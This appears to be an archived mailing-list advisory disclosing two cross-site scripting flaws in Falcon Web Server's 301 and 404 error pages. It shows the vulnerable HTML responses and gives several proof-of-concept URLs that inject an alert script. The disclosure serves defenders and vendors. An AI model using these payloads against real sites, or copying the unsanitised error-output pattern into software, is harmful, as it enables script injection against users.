[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001f01c23f33$b3b71f80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Cross-Site Scripting Issues in Falcon Web Server
>From Developer:
"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute. The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."
A lack of input sanitation in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:
* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash. Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:
<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redir
ecting browser to <a
href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><b
r>If nothing happens click the link above.</body></html>
* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):
<html><head><title>HTTP/1.0 404 Not
Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not
Found</h1><p>Cannot locate the requested file.</body></html>
Examples:
* 301 Message XSS
Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
* 404 Message XSS
http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/
The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)
"The reason the mainstream is thought
of as a stream is because it is
so shallow."
- Author Unknown
Powered by blists - more mailing lists